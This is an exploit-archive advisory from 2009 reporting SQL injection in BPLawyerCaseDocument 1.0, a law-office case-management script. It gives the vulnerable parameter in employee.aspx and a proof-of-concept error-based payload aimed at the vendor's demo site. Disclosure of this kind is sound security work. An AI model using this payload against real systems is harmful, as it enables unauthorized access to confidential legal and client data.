BPLawyerCaseDocuments - SQL Injection

EDB-ID:

9834


Author:

OoN Boy

Type:

webapps


Platform:

ASP

Date:

2009-09-22


[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities								    |
 | Software 		: BPLawyerCaseDocument												    |
 | Vendor   		: http://bpowerhouse.info											    |
 | Demo			: http://www.bpowerhouse.info/BPLawyerCaseDocuments								    |
 | Date    		: 22 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Technology		: ASP.NET 2.0                                                                                                       |
 | Database		: MSSQL 2005                                                                                                        |
 | Version		: 1.0         		                                                                                            |
 | License		: GNU GPL                                                                                                           |
 | Price		: $29.00                                                                                                            |
 | Description		: Is a script where lawyers can manage cases and deal with case documents in an easy way. The script allows	    |
 |			  attorneys and law offices to manage and view case documents. It includes an agent panel where agents can login and|
 |			  manage clients information and includes an administrator panel where site administrator can have control of all   |
 |			  Data														    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Google Dork 		: cari sendiri yah :)												    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/employee.aspx?cat=[sql]				 	 			    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Proof of concept	: http://www.bpowerhouse.info/BPLawyerCaseDocuments/employee.aspx?cat=1+and+1=convert(int,@@version)--		    |
 |			  you must login for test											    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                       |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Note			: Selamat hariraya idul fitri mohon maaf lahir dan batin, maafin kesalahan ku selama ini yah all :)		    |
 |			  kabur.... untuk sementara waktu.... bye bye.....								    |
[x]========================================================================================================================================[x]